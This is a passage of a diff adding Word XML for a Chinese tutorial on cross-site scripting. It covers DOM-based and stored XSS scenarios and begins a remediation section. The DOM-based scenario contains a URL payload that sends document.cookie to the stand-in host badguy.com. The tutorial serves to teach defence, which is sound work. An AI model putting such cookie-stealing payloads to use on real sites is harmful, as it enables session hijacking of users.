+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>中已经提供了现成的方法，只要调用</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HttpUtility.HtmlEncode("string &lt;scritp&gt;") </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>就可以了。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>攻击场景</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dom-Based XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>漏洞</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>攻击过程如下</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tom </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>发现了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Victim.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>中的一个页面有</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>漏洞，</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>例如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>: http://victim.com/search.asp?term=apple</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tom </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>先建立一个网站</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">http://badguy.com,  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>用来接收</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>偷</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>来的信息。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>然后</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tom </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>构造一个恶意的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>url(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>如下</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>通过某种方式</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>邮件，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>QQ)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>发给</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>http://victim.com/search.asp?term=&lt;script&gt;window.open("http://badguy.com?cookie="+document.cookie)&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>点击了这个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>，嵌入在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>中的恶意</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Javascript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>代码就会在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>的浏览器中执行</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>那么</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>victim.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>网站的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cookie, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>就会被发送到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>badguy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>网站中。这样</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">victim.com </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>的信息就被</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Tom</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>盗了</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>s:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>上面</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>的意思是打开</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>victim.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>页面，并将该网站的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>Cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>作为参数传给</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>badguy.com</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>网站。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>Stored XSS(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>存储式</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>漏洞</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="0070C0"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>该类型是应用广泛而且有可能影响大</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>服务器自身安全的漏洞，攻击者将攻击脚本上传到</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>Web</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>服务器上，使得所有访问该页面的用户都面临信息泄露的可能。</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>攻击过程如下</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Alex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>发现了网站</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>上有一个</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>漏洞，该漏洞允许将攻击代码保存在数据库中，</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Alex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>发布了一篇文章，文章中嵌入了恶意</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>代码。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>其他人如</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>访问这片文章的时候，嵌入在文章中的恶意</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Javascript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>代码就会在</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Monica</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>的浏览器中执行，其会话</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>或者其他信息将被</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Alex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>盗走。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>Dom-Based XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>漏洞威胁用户个体，而存储式</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>漏洞所威胁的对象将是大量的用户</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>漏洞修复</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="10"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>将重要的</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:kern w:val="0"/>
+        </w:rPr>
+        <w:t>ookie</w:t>
+      </w:r>
